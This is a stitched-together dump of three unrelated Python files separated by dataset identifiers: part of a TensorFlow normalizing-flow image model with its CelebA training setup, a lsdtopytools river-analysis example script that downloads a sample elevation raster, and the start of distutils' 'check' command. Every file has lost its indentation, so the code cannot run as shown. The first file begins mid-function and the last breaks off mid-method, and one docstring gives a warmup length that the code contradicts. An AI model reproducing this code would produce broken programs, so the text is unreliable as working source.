with tf.variable_scope(name):
g = get_var('g', shape=x.shape[1:], initializer=tf.constant_initializer(1.), ema=ema)
b = get_var('b', shape=x.shape[1:], initializer=tf.constant_initializer(0.), ema=ema)
if init:
# data based normalization
m_init, v_init = tf.nn.moments(x, [0])
scale_init = init_scale * tf.rsqrt(v_init + 1e-8)
assert m_init.shape == v_init.shape == scale_init.shape == g.shape == b.shape
with tf.control_dependencies([
g.assign(scale_init),
b.assign(-m_init * scale_init)
]):
g, b = tf.identity_n([g, b])
return g, b
def dense(x, *, name, num_units, init_scale=1., init, ema):
with tf.variable_scope(name):
_, in_dim = x.shape
W = get_var('W', shape=[in_dim, num_units], initializer=tf.random_normal_initializer(0, 0.05), ema=ema)
b = get_var('b', shape=[num_units], initializer=tf.constant_initializer(0.), ema=ema)
if init:
y = tf.matmul(x, W)
m_init, v_init = tf.nn.moments(y, [0])
scale_init = init_scale * tf.rsqrt(v_init + 1e-8)
with tf.control_dependencies([
W.assign(W * scale_init[None, :]),
b.assign(-m_init * scale_init),
]):
x = tf.identity(x)
return tf.nn.bias_add(tf.matmul(x, W), b)
def conv2d(x, *, name, num_units, filter_size=(3, 3), stride=(1, 1), pad='SAME', init_scale=1., init, ema):
with tf.variable_scope(name):
assert x.shape.ndims == 4
W = get_var('W', shape=[*filter_size, int(x.shape[-1]), num_units],
initializer=tf.random_normal_initializer(0, 0.05), ema=ema)
b = get_var('b', shape=[num_units], initializer=tf.constant_initializer(0.), ema=ema)
if init:
y = tf.nn.conv2d(x, W, [1, *stride, 1], pad)
m_init, v_init = tf.nn.moments(y, [0, 1, 2])
scale_init = init_scale * tf.rsqrt(v_init + 1e-8)
with tf.control_dependencies([
W.assign(W * scale_init[None, None, None, :]),
b.assign(-m_init * scale_init),
]):
x = tf.identity(x)
return tf.nn.bias_add(tf.nn.conv2d(x, W, [1, *stride, 1], pad), b)
def nin(x, *, num_units, **kwargs):
assert 'num_units' not in kwargs
s = x.shape.as_list()
x = tf.reshape(x, [np.prod(s[:-1]), s[-1]])
x = dense(x, num_units=num_units, **kwargs)
return tf.reshape(x, s[:-1] + [num_units])
def matmul_last_axis(x, w):
_, out_dim = w.shape
s = x.shape.as_list()
x = tf.reshape(x, [np.prod(s[:-1]), s[-1]])
x = tf.matmul(x, w)
return tf.reshape(x, s[:-1] + [out_dim])
def concat_elu(x, *, axis=-1):
return tf.nn.elu(tf.concat([x, -x], axis=axis))
def gate(x, *, axis):
a, b = tf.split(x, 2, axis=axis)
return a * tf.sigmoid(b)
def gated_resnet(x, *, name, a, nonlinearity=concat_elu, conv=conv2d, use_nin, init, ema, dropout_p):
with tf.variable_scope(name):
num_filters = int(x.shape[-1])
c1 = conv(nonlinearity(x), name='c1', num_units=num_filters, init=init, ema=ema)
if a is not None: # add short-cut connection if auxiliary input 'a' is given
c1 += nin(nonlinearity(a), name='a_proj', num_units=num_filters, init=init, ema=ema)
c1 = nonlinearity(c1)
if dropout_p > 0:
c1 = tf.nn.dropout(c1, keep_prob=1. - dropout_p)
c2 = (nin if use_nin else conv)(c1, name='c2', num_units=num_filters * 2, init_scale=0.1, init=init, ema=ema)
return x + gate(c2, axis=3)
def attn(x, *, name, pos_emb, heads, init, ema, dropout_p):
with tf.variable_scope(name):
bs, height, width, ch = x.shape.as_list()
assert pos_emb.shape == [height, width, ch]
assert ch % heads == 0
timesteps = height * width
dim = ch // heads
# Position embeddings
c = x + pos_emb[None, :, :, :]
# b, h, t, d == batch, num heads, num timesteps, per-head dim (C // heads)
c = nin(c, name='proj1', num_units=3 * ch, init=init, ema=ema)
assert c.shape == [bs, height, width, 3 * ch]
# Split into heads / Q / K / V
c = tf.reshape(c, [bs, timesteps, 3, heads, dim]) # b, t, 3, h, d
c = tf.transpose(c, [2, 0, 3, 1, 4]) # 3, b, h, t, d
q_bhtd, k_bhtd, v_bhtd = tf.unstack(c, axis=0)
assert q_bhtd.shape == k_bhtd.shape == v_bhtd.shape == [bs, heads, timesteps, dim]
# Attention
w_bhtt = tf.matmul(q_bhtd, k_bhtd, transpose_b=True) / np.sqrt(float(dim))
w_bhtt = tf.cast(tf.nn.softmax(at_least_float32(w_bhtt)), dtype=x.dtype)
assert w_bhtt.shape == [bs, heads, timesteps, timesteps]
a_bhtd = tf.matmul(w_bhtt, v_bhtd)
# Merge heads
a_bthd = tf.transpose(a_bhtd, [0, 2, 1, 3])
assert a_bthd.shape == [bs, timesteps, heads, dim]
a_btc = tf.reshape(a_bthd, [bs, timesteps, ch])
# Project
c1 = tf.reshape(a_btc, [bs, height, width, ch])
if dropout_p > 0:
c1 = tf.nn.dropout(c1, keep_prob=1. - dropout_p)
c2 = nin(c1, name='proj2', num_units=ch * 2, init_scale=0.1, init=init, ema=ema)
return x + gate(c2, axis=3)
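# Worked shape example for attn() above (illustrative numbers, not new code):
# with x of shape [B, H, W, C] = [8, 16, 16, 96] and heads = 4, we get
# timesteps = 256 and dim = 24; q/k/v are each [8, 4, 256, 24], the attention
# weights w_bhtt are [8, 4, 256, 256], and the heads are merged back to
# [8, 16, 16, 96] before the final gated residual projection.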
class Flow:
def forward(self, x, **kwargs):
raise NotImplementedError
def backward(self, y, **kwargs):
raise NotImplementedError
class Inverse(Flow):
def __init__(self, base_flow):
self.base_flow = base_flow
def forward(self, x, **kwargs):
return self.base_flow.inverse(x, **kwargs)
def inverse(self, y, **kwargs):
return self.base_flow.forward(y, **kwargs)
class Compose(Flow):
def __init__(self, flows):
self.flows = flows
def _maybe_tqdm(self, iterable, desc, verbose):
return tqdm(iterable, desc=desc) if verbose else iterable
def forward(self, x, **kwargs):
bs = int((x[0] if isinstance(x, tuple) else x).shape[0])
logd_terms = []
for i, f in enumerate(self._maybe_tqdm(self.flows, desc='forward {}'.format(kwargs),
verbose=kwargs.get('verbose'))):
assert isinstance(f, Flow)
x, l = f.forward(x, **kwargs)
if l is not None:
assert l.shape == [bs]
logd_terms.append(l)
return x, tf.add_n(logd_terms) if logd_terms else tf.constant(0.)
def inverse(self, y, **kwargs):
bs = int((y[0] if isinstance(y, tuple) else y).shape[0])
logd_terms = []
for i, f in enumerate(
self._maybe_tqdm(self.flows[::-1], desc='inverse {}'.format(kwargs), verbose=kwargs.get('verbose'))):
assert isinstance(f, Flow)
y, l = f.inverse(y, **kwargs)
if l is not None:
assert l.shape == [bs]
logd_terms.append(l)
return y, tf.add_n(logd_terms) if logd_terms else tf.constant(0.)
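# Hedged usage sketch: a Compose behaves like a single Flow and accumulates the
# per-example log-determinants of its parts. The input tensor x below is an
# assumption; the real graph construction happens in flow_training_celeba.
#
#     flow = Compose([CheckerboardSplit(), Norm(), TupleFlip(), Inverse(CheckerboardSplit())])
#     y, logd = flow.forward(x, init=True)    # logd has shape [batch_size]
#     x_rec, inv_logd = flow.inverse(y)       # inverts the same stack in reverse order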
class ImgProc(Flow):
def forward(self, x, **kwargs):
x = x * (.9 / 32) + .05 # [0, 32] -> [.05, .95]
x = -tf.log(1. / x - 1.) # inverse sigmoid
logd = np.log(.9 / 32) + tf.nn.softplus(x) + tf.nn.softplus(-x)
logd = tf.reduce_sum(tf.reshape(logd, [int_shape(logd)[0], -1]), 1)
return x, logd
def inverse(self, y, **kwargs):
y = tf.sigmoid(y)
logd = tf.log(y) + tf.log(1. - y)
y = (y - .05) / (.9 / 32) # [.05, .95] -> [0, 32]
logd -= np.log(.9 / 32)
logd = tf.reduce_sum(tf.reshape(logd, [int_shape(logd)[0], -1]), 1)
return y, logd
class TupleFlip(Flow):
def forward(self, x, **kwargs):
assert isinstance(x, tuple)
a, b = x
return (b, a), None
def inverse(self, y, **kwargs):
assert isinstance(y, tuple)
a, b = y
return (b, a), None
class SpaceToDepth(Flow):
def __init__(self, block_size=2):
self.block_size = block_size
def forward(self, x, **kwargs):
return tf.space_to_depth(x, self.block_size), None
def inverse(self, y, **kwargs):
return tf.depth_to_space(y, self.block_size), None
class CheckerboardSplit(Flow):
def forward(self, x, **kwargs):
assert isinstance(x, tf.Tensor)
B, H, W, C = x.shape
x = tf.reshape(x, [B, H, W // 2, 2, C])
a, b = tf.unstack(x, axis=3)
assert a.shape == b.shape == [B, H, W // 2, C]
return (a, b), None
def inverse(self, y, **kwargs):
assert isinstance(y, tuple)
a, b = y
assert a.shape == b.shape
B, H, W_half, C = a.shape
x = tf.stack([a, b], axis=3)
assert x.shape == [B, H, W_half, 2, C]
return tf.reshape(x, [B, H, W_half * 2, C]), None
class ChannelSplit(Flow):
def forward(self, x, **kwargs):
assert isinstance(x, tf.Tensor)
assert len(x.shape) == 4 and x.shape[3] % 2 == 0
return tuple(tf.split(x, 2, axis=3)), None
def inverse(self, y, **kwargs):
assert isinstance(y, tuple)
a, b = y
return tf.concat([a, b], axis=3), None
class Sigmoid(Flow):
def forward(self, x, **kwargs):
y = tf.sigmoid(x)
logd = -tf.nn.softplus(x) - tf.nn.softplus(-x)
return y, sumflat(logd)
def inverse(self, y, **kwargs):
x = inverse_sigmoid(y)
logd = -tf.log(y) - tf.log(1. - y)
return x, sumflat(logd)
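# Derivation note for the log-determinants above (no new code): for y = sigmoid(x),
# dy/dx = sigmoid(x) * (1 - sigmoid(x)); using log(sigmoid(x)) = -softplus(-x) and
# log(1 - sigmoid(x)) = -softplus(x), the forward per-element log-det is
# -softplus(x) - softplus(-x), and the inverse direction is its negation,
# -log(y) - log(1 - y), both reduced over the non-batch axes by sumflat().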
class Norm(Flow):
def __init__(self, init_scale=1.):
def f(input_, forward, init, ema):
assert not isinstance(input_, list)
if isinstance(input_, tuple):
is_tuple = True
else:
assert isinstance(input_, tf.Tensor)
input_ = [input_]
is_tuple = False
bs = int(input_[0].shape[0])
g_and_b = []
for (i, x) in enumerate(input_):
g, b = init_normalization(x, name='norm{}'.format(i), init_scale=init_scale, init=init, ema=ema)
g = tf.maximum(g, 1e-10)
assert x.shape[0] == bs and g.shape == b.shape == x.shape[1:]
g_and_b.append((g, b))
logd = tf.fill([bs], tf.add_n([tf.reduce_sum(tf.log(g)) for (g, _) in g_and_b]))
if forward:
out = [x * g[None] + b[None] for (x, (g, b)) in zip(input_, g_and_b)]
else:
out = [(x - b[None]) / g[None] for (x, (g, b)) in zip(input_, g_and_b)]
logd = -logd
if not is_tuple:
assert len(out) == 1
return out[0], logd
return tuple(out), logd
self.template = tf.make_template(self.__class__.__name__, f)
def forward(self, x, init=False, ema=None, **kwargs):
return self.template(x, forward=True, init=init, ema=ema)
def inverse(self, y, init=False, ema=None, **kwargs):
return self.template(y, forward=False, init=init, ema=ema)
class MixLogisticCoupling(Flow):
"""
CDF of mixture of logistics, followed by affine
"""
def __init__(self, filters, blocks, use_nin, components, attn_heads, use_ln,
with_affine=True, use_final_nin=False, init_scale=0.1, nonlinearity=concat_elu):
self.components = components
self.with_affine = with_affine
self.scale_flow = Inverse(Sigmoid())
def f(x, init, ema, dropout_p, verbose, context):
# if verbose and context is not None:
# print('got context')
if init and verbose:
# debug stuff
with tf.variable_scope('debug'):
xmean, xvar = tf.nn.moments(x, axes=list(range(len(x.get_shape()))))
x = tf.Print(
x,
[
tf.shape(x), xmean, tf.sqrt(xvar), tf.reduce_min(x), tf.reduce_max(x),
tf.reduce_any(tf.is_nan(x)), tf.reduce_any(tf.is_inf(x))
],
message='{} (shape/mean/std/min/max/nan/inf) '.format(self.template.variable_scope.name),
summarize=10,
)
B, H, W, C = x.shape.as_list()
pos_emb = to_default_floatx(get_var(
'pos_emb', ema=ema, shape=[H, W, filters], initializer=tf.random_normal_initializer(stddev=0.01),
))
x = conv2d(x, name='c1', num_units=filters, init=init, ema=ema)
for i_block in range(blocks):
with tf.variable_scope('block{}'.format(i_block)):
x = gated_resnet(
x, name='conv', a=context, use_nin=use_nin, init=init, ema=ema, dropout_p=dropout_p
)
if use_ln:
x = norm(x, name='ln1', ema=ema)
x = nonlinearity(x)
x = (nin if use_final_nin else conv2d)(
x, name='c2', num_units=C * (2 + 3 * components), init_scale=init_scale, init=init, ema=ema
)
assert x.shape == [B, H, W, C * (2 + 3 * components)]
x = tf.reshape(x, [B, H, W, C, 2 + 3 * components])
x = at_least_float32(x) # do mix-logistics in tf.float32
s, t = tf.tanh(x[:, :, :, :, 0]), x[:, :, :, :, 1]
ml_logits, ml_means, ml_logscales = tf.split(x[:, :, :, :, 2:], 3, axis=4)
ml_logscales = tf.maximum(ml_logscales, -7.)
assert s.shape == t.shape == [B, H, W, C]
assert ml_logits.shape == ml_means.shape == ml_logscales.shape == [B, H, W, C, components]
return s, t, ml_logits, ml_means, ml_logscales
self.template = tf.make_template(self.__class__.__name__, f)
def forward(self, x, init=False, ema=None, dropout_p=0., verbose=True, context=None, **kwargs):
assert isinstance(x, tuple)
cf, ef = x
float_ef = at_least_float32(ef)
s, t, ml_logits, ml_means, ml_logscales = self.template(
cf, init=init, ema=ema, dropout_p=dropout_p, verbose=verbose, context=context
)
out = tf.exp(
mixlogistic_logcdf(x=float_ef, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
)
out, scale_logd = self.scale_flow.forward(out)
if self.with_affine:
assert out.shape == s.shape == t.shape
out = tf.exp(s) * out + t
logd = mixlogistic_logpdf(x=float_ef, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
if self.with_affine:
assert s.shape == logd.shape
logd += s
logd = tf.reduce_sum(tf.layers.flatten(logd), axis=1)
assert scale_logd.shape == logd.shape
logd += scale_logd
out, logd = map(to_default_floatx, [out, logd])
assert out.shape == ef.shape == cf.shape and out.dtype == ef.dtype == logd.dtype == cf.dtype
return (cf, out), logd
def inverse(self, y, init=False, ema=None, dropout_p=0., verbose=True, context=None, **kwargs):
assert isinstance(y, tuple)
cf, ef = y
float_ef = at_least_float32(ef)
s, t, ml_logits, ml_means, ml_logscales = self.template(
cf, init=init, ema=ema, dropout_p=dropout_p, verbose=verbose, context=context
)
out = float_ef
if self.with_affine:
out = tf.exp(-s) * (out - t)
out, invscale_logd = self.scale_flow.inverse(out)
out = tf.clip_by_value(out, 1e-5, 1. - 1e-5)
out = mixlogistic_invcdf(y=out, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
logd = mixlogistic_logpdf(x=out, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
if self.with_affine:
assert s.shape == logd.shape
logd += s
logd = -tf.reduce_sum(tf.layers.flatten(logd), axis=1)
assert invscale_logd.shape == logd.shape
logd += invscale_logd
out, logd = map(to_default_floatx, [out, logd])
assert out.shape == ef.shape == cf.shape and out.dtype == ef.dtype == logd.dtype == cf.dtype
return (cf, out), logd
class MixLogisticAttnCoupling(Flow):
"""
CDF of mixture of logistics, followed by affine
"""
def __init__(self, filters, blocks, use_nin, components, attn_heads, use_ln,
with_affine=True, use_final_nin=False, init_scale=0.1, nonlinearity=concat_elu):
self.components = components
self.with_affine = with_affine
self.scale_flow = Inverse(Sigmoid())
def f(x, init, ema, dropout_p, verbose, context):
if init and verbose:
with tf.variable_scope('debug'):
xmean, xvar = tf.nn.moments(x, axes=list(range(len(x.get_shape()))))
x = tf.Print(
x,
[
tf.shape(x), xmean, tf.sqrt(xvar), tf.reduce_min(x), tf.reduce_max(x),
tf.reduce_any(tf.is_nan(x)), tf.reduce_any(tf.is_inf(x))
],
message='{} (shape/mean/std/min/max/nan/inf) '.format(self.template.variable_scope.name),
summarize=10,
)
B, H, W, C = x.shape.as_list()
pos_emb = to_default_floatx(get_var(
'pos_emb', ema=ema, shape=[H, W, filters], initializer=tf.random_normal_initializer(stddev=0.01),
))
x = conv2d(x, name='c1', num_units=filters, init=init, ema=ema)
for i_block in range(blocks):
with tf.variable_scope('block{}'.format(i_block)):
x = gated_resnet(
x, name='conv', a=context, use_nin=use_nin, init=init, ema=ema, dropout_p=dropout_p
)
if use_ln:
x = norm(x, name='ln1', ema=ema)
x = attn(
x, name='attn', pos_emb=pos_emb, heads=attn_heads, init=init, ema=ema, dropout_p=dropout_p
)
if use_ln:
x = norm(x, name='ln2', ema=ema)
assert x.shape == [B, H, W, filters]
x = nonlinearity(x)
x = (nin if use_final_nin else conv2d)(
x, name='c2', num_units=C * (2 + 3 * components), init_scale=init_scale, init=init, ema=ema
)
assert x.shape == [B, H, W, C * (2 + 3 * components)]
x = tf.reshape(x, [B, H, W, C, 2 + 3 * components])
x = at_least_float32(x) # do mix-logistics stuff in float32
s, t = tf.tanh(x[:, :, :, :, 0]), x[:, :, :, :, 1]
ml_logits, ml_means, ml_logscales = tf.split(x[:, :, :, :, 2:], 3, axis=4)
ml_logscales = tf.maximum(ml_logscales, -7.)
assert s.shape == t.shape == [B, H, W, C]
assert ml_logits.shape == ml_means.shape == ml_logscales.shape == [B, H, W, C, components]
return s, t, ml_logits, ml_means, ml_logscales
self.template = tf.make_template(self.__class__.__name__, f)
def forward(self, x, init=False, ema=None, dropout_p=0., verbose=True, context=None, **kwargs):
assert isinstance(x, tuple)
cf, ef = x
float_ef = at_least_float32(ef)
s, t, ml_logits, ml_means, ml_logscales = self.template(
cf, init=init, ema=ema, dropout_p=dropout_p, verbose=verbose, context=context
)
out = tf.exp(
mixlogistic_logcdf(x=float_ef, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
)
out, scale_logd = self.scale_flow.forward(out)
if self.with_affine:
assert out.shape == s.shape == t.shape
out = tf.exp(s) * out + t
logd = mixlogistic_logpdf(x=float_ef, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
if self.with_affine:
assert s.shape == logd.shape
logd += s
logd = tf.reduce_sum(tf.layers.flatten(logd), axis=1)
assert scale_logd.shape == logd.shape
logd += scale_logd
out, logd = map(to_default_floatx, [out, logd])
assert out.shape == ef.shape == cf.shape and out.dtype == ef.dtype == logd.dtype == cf.dtype
return (cf, out), logd
def inverse(self, y, init=False, ema=None, dropout_p=0., verbose=True, context=None, **kwargs):
assert isinstance(y, tuple)
cf, ef = y
float_ef = at_least_float32(ef)
s, t, ml_logits, ml_means, ml_logscales = self.template(
cf, init=init, ema=ema, dropout_p=dropout_p, verbose=verbose, context=context
)
out = float_ef
if self.with_affine:
out = tf.exp(-s) * (out - t)
out, invscale_logd = self.scale_flow.inverse(out)
out = tf.clip_by_value(out, 1e-5, 1. - 1e-5)
out = mixlogistic_invcdf(y=out, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
logd = mixlogistic_logpdf(x=out, prior_logits=ml_logits, means=ml_means, logscales=ml_logscales)
if self.with_affine:
assert s.shape == logd.shape
logd += s
logd = -tf.reduce_sum(tf.layers.flatten(logd), axis=1)
assert invscale_logd.shape == logd.shape
logd += invscale_logd
out, logd = map(to_default_floatx, [out, logd])
assert out.shape == ef.shape == cf.shape and out.dtype == ef.dtype == logd.dtype == cf.dtype
return (cf, out), logd
def gaussian_sample_logp(shape, dtype):
eps = tf.random_normal(shape)
logp = Normal(0., 1.).log_prob(eps)
assert logp.shape == eps.shape
logp = tf.reduce_sum(tf.layers.flatten(logp), axis=1)
return tf.cast(eps, dtype=dtype), tf.cast(logp, dtype=dtype)
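# Example (illustrative): eps, logp = gaussian_sample_logp([16, 8, 8, 96], tf.float32)
# draws a standard-normal sample of that shape and returns its log-density summed
# over all non-batch dimensions, so logp has shape [16]. Dequantizer.forward below
# uses this pair as the noise sample and the entropy term of the variational bound.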
class UniformDequantizer(Flow):
def forward(self, x, **kwargs):
return x + tf.random_uniform(x.shape.as_list(), minval=0, maxval=1, dtype=DEFAULT_FLOATX), tf.zeros(x.shape.as_list()[0])
def inverse(self, y, **kwargs):
        # ¯\_(ツ)_/¯
pass
class Dequantizer(Flow):
def __init__(self, dequant_flow):
super().__init__()
assert isinstance(dequant_flow, Flow)
self.dequant_flow = dequant_flow
def deep_processor(x, *, init, ema, dropout_p):
(this, that), _ = CheckerboardSplit().forward(x)
processed_context = conv2d(tf.concat([this, that], 3), name='proj', num_units=32, init=init, ema=ema)
for i in range(5):
processed_context = gated_resnet(
processed_context, name='c{}'.format(i),
a=None, dropout_p=dropout_p, ema=ema, init=init,
use_nin=False
)
processed_context = norm(processed_context, name='dqln{}'.format(i), ema=ema)
return processed_context
self.context_proc = tf.make_template("context_proc", deep_processor)
def forward(self, x, init=False, ema=None, dropout_p=0., verbose=True, **kwargs):
eps, eps_logli = gaussian_sample_logp(x.shape, dtype=DEFAULT_FLOATX)
unbound_xd, logd = self.dequant_flow.forward(
eps,
context=self.context_proc(x / 32.0 - 0.5, init=init, ema=ema, dropout_p=dropout_p),
init=init, ema=ema, dropout_p=dropout_p, verbose=verbose
)
xd, sigmoid_logd = Sigmoid().forward(unbound_xd)
assert x.shape == xd.shape and logd.shape == sigmoid_logd.shape == eps_logli.shape
return x + xd, logd + sigmoid_logd - eps_logli
def construct(*, filters, blocks, components, attn_heads, use_nin, use_ln):
dequant_coupling_kwargs = dict(
filters=filters, blocks=5, use_nin=use_nin, components=components, attn_heads=attn_heads, use_ln=use_ln
)
dequant_flow = Dequantizer(Compose([
CheckerboardSplit(),
Norm(),
MixLogisticCoupling(**dequant_coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticCoupling(**dequant_coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticCoupling(**dequant_coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticCoupling(**dequant_coupling_kwargs), TupleFlip(),
Inverse(CheckerboardSplit()),
]))
#dequant_flow = UniformDequantizer()
coupling_kwargs = dict(
filters=filters, blocks=blocks, use_nin=use_nin, components=components, attn_heads=attn_heads, use_ln=use_ln
)
flow = Compose([
#128x128x3
ImgProc(),
#64x64x12
SpaceToDepth(),
#32x32x48
SpaceToDepth(),
CheckerboardSplit(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Inverse(CheckerboardSplit()),
#16x16x192
SpaceToDepth(),
ChannelSplit(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Inverse(ChannelSplit()),
CheckerboardSplit(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Inverse(CheckerboardSplit()),
# 8x8x768
SpaceToDepth(),
ChannelSplit(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Inverse(ChannelSplit()),
CheckerboardSplit(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Norm(),
MixLogisticAttnCoupling(**coupling_kwargs), TupleFlip(),
Inverse(CheckerboardSplit()),
])
return dequant_flow, flow
def main():
global DEFAULT_FLOATX
DEFAULT_FLOATX = tf.float32
max_lr = 1e-5
warmup_steps = 50000
bs = 48
# set this to a smaller value if it can't fit on your GPU.
# make sure bs % num_mpi_processes == 0. There will be an assertion error otherwise.
def lr_schedule(step, *, decay=0.9995):
"""Ramp up to 1e-5 in 20K steps, stay there for the rest of training."""
if step < warmup_steps:
return max_lr * step / warmup_steps
else:
return 1e-5
"""
def lr_schedule(step, *, decay=0.9995):
#Ramp up to 4e-5 in 20K steps, stay there till 50K, geometric decay to 1e-5 by 55K steps, stay there
global curr_lr
if step < warmup_steps:
return max_lr * step / warmup_steps
elif step >= warmup_steps and step <= (2.5 * warmup_steps):
curr_lr = max_lr
return max_lr
elif step > (2.5 * warmup_steps) and curr_lr > 1e-5:
curr_lr *= decay
return curr_lr
return curr_lr
"""
dropout_p = 0.
filters = 96
blocks = 12
components = 4 # logistic mixture components
attn_heads = 4
use_ln = True
floatx_str = {tf.float32: 'fp32', tf.float16: 'fp16'}[DEFAULT_FLOATX]
flow_training_celeba.train(
flow_constructor=lambda: construct(
filters=filters,
components=components,
attn_heads=attn_heads,
blocks=blocks,
use_nin=True,
use_ln=use_ln
),
logdir=f'~/logs/2018-11-19/celeba128_5bit_ELU_code_release_mix{components}_b{blocks}_f{filters}_h{attn_heads}_ln{int(use_ln)}_lr{max_lr}_bs{bs}_drop{dropout_p}_{floatx_str}',
lr_schedule=lr_schedule,
dropout_p=dropout_p,
seed=0,
init_bs=64, # set this to a smaller value if it can't fit on your GPU.
dataset='celeba128_5bit',
total_bs=bs,
ema_decay=.999,
steps_per_log=100,
steps_per_dump=5000,
steps_per_samples=5000,
max_grad_norm=1.,
dtype=DEFAULT_FLOATX,
scale_loss=1e-2 if DEFAULT_FLOATX == tf.float16 else None,
n_epochs=1000,
restore_checkpoint=None, # put in path to checkpoint in the format: path_to_checkpoint/model (no .meta / .ckpt)
save_jpg=True, # turn this on/off based on whether you want to save jpg version of low-bit samples while the model is training.
)
if __name__ == '__main__':
main()
|
the-stack_106_15882
|
"""
This example script downloads a test raster, then calculates and plots normalised channel steepness (ksn).
Read the comments to understand each step. Copy and adapt this script to learn.
If any questions: [email protected]
B.G.
"""
# If you are facing a common matplotlib issue, uncomment that:
#################################################
# import matplotlib
# matplotlib.use("Agg")
#################################################
from lsdtopytools import LSDDEM # I am telling python I will need this module to run.
from lsdtopytools import quickplot, quickplot_movern # We will need the plotting routines
import time as clock # Basic benchmarking
import sys # manage the argv
from matplotlib import pyplot as plt # plotting
import numpy as np #
# Run with download to download the test dem:
# `python plot_ksn_analysis.py download` instead of `python plot_ksn_analysis.py`
##################################################################################################
# The following code downloads a test site in Scotland. Replace it with your own raster if you need to.
# Requires wget, a small python port of the linux wget command, available for all OSs
# "pip install wget" will install it easily
if(len(sys.argv)>1):
if(sys.argv[1].lower() == "download"):
import wget
print("Downloading a test dataset: ")
file = wget.download("https://github.com/LSDtopotools/LSDTT_workshop_data/raw/master/WAWater.bil")
wget.download("https://github.com/LSDtopotools/LSDTT_workshop_data/raw/master/WAWater.hdr")
print("Done")
##################################################################################################
my_raster_path = "./" # I am telling saving my path to a variable. In this case, I assume the rasters is in the same folder than my script
file_name = "WAWater.bil" # The name of your raster with extension. RasterIO then takes care internally of decoding it. Good guy rasterio!
# I am now telling lsdtopytools where my raster is and what I want to do with it. No worries, it will deal with the details internally
mydem = LSDDEM(path = my_raster_path, file_name = file_name) # If your dem is already preprocessed: filled or carved basically, add: , is_preprocessed = True
## Loaded in the system, now preprocessing: I want to carve it and impose a minimal slope on remaining flat surfaces: 0.0001
mydem.PreProcessing(filling = True, carving = True, minimum_slope_for_filling = 0.0001) # Unnecessary if already preprocessed, of course.
mydem.ExtractRiverNetwork( method = "area_threshold", area_threshold_min = 500)
mydem.DefineCatchment( method="from_XY", X_coords = [527107, 527033, 530832], Y_coords = [6190656, 6191745, 6191015])
mydem.GenerateChi(theta=0.45,A_0 = 1)
print("Starting movern extraction")
mydem.cppdem.calculate_movern_disorder(0.1, 0.05, 18, 1, 1000) # start theta, delta, n, A0, threshold
print("movern done, getting the data")
quickplot_movern.plot_disorder_results(mydem, normalise = True, figsize = (4,3), dpi = 300, output = "save", format_figure = "png", legend = True,
cumulative_best_fit = True)
quickplot_movern.plot_disorder_map(mydem ,figure_width = 4, figure_width_units = "inches", cmap = "jet", alpha_hillshade = 0.95,
this_fontsize = 6, alpha_catchments = 0.75, dpi = 300, output = "save", format_figure = "png")
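# To adapt this script to your own DEM (hedged sketch that reuses only the calls
# already shown above — the path, file name and outlet coordinates are placeholders):
#
# mydem = LSDDEM(path = "/path/to/your/data/", file_name = "your_dem.bil")
# mydem.PreProcessing(filling = True, carving = True, minimum_slope_for_filling = 0.0001)
# mydem.ExtractRiverNetwork(method = "area_threshold", area_threshold_min = 1000)
# mydem.DefineCatchment(method = "from_XY", X_coords = [your_x], Y_coords = [your_y])
# mydem.GenerateChi(theta = 0.45, A_0 = 1)
# mydem.cppdem.calculate_movern_disorder(0.1, 0.05, 18, 1, 1000)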
|
the-stack_106_15883
|
"""distutils.command.check
Implements the Distutils 'check' command.
"""
from distutils.core import Command
from distutils.errors import DistutilsSetupError
try:
# docutils is installed
from docutils.utils import Reporter
from docutils.parsers.rst import Parser
from docutils import frontend
from docutils import nodes
from io import StringIO
class SilentReporter(Reporter):
def __init__(self, source, report_level, halt_level, stream=None,
debug=0, encoding='ascii', error_handler='replace'):
self.messages = []
Reporter.__init__(self, source, report_level, halt_level, stream,
debug, encoding, error_handler)
def system_message(self, level, message, *children, **kwargs):
self.messages.append((level, message, children, kwargs))
return nodes.system_message(message, level=level,
type=self.levels[level],
*children, **kwargs)
HAS_DOCUTILS = True
except Exception:
# Catch all exceptions because exceptions besides ImportError probably
# indicate that docutils is not ported to Py3k.
HAS_DOCUTILS = False
class check(Command):
"""This command checks the meta-data of the package.
"""
description = ("perform some checks on the package")
user_options = [('metadata', 'm', 'Verify meta-data'),
('restructuredtext', 'r',
                     ('Checks if long string meta-data syntax '
                      'is reStructuredText-compliant')),
('strict', 's',
'Will exit with an error if a check fails')]
boolean_options = ['metadata', 'restructuredtext', 'strict']
def initialize_options(self):
"""Sets default values for options."""
self.restructuredtext = 0
self.metadata = 1
self.strict = 0
self._warnings = 0
def finalize_options(self):
pass
def warn(self, msg):
"""Counts the number of warnings that occurs."""
self._warnings += 1
return Command.warn(self, msg)
def run(self):
"""Runs the command."""
# perform the various tests
if self.metadata:
self.check_metadata()
if self.restructuredtext:
if HAS_DOCUTILS:
self.check_restructuredtext()
elif self.strict:
raise DistutilsSetupError('The docutils package is needed.')
# let's raise an error in strict mode, if we have at least
# one warning
if self.strict and self._warnings > 0:
raise DistutilsSetupError('Please correct your package.')
def check_metadata(self):
"""Ensures that all required elements of meta-data are supplied.
name, version, URL, (author and author_email) or
(maintainer and maintainer_email)).
Warns if any are missing.
"""
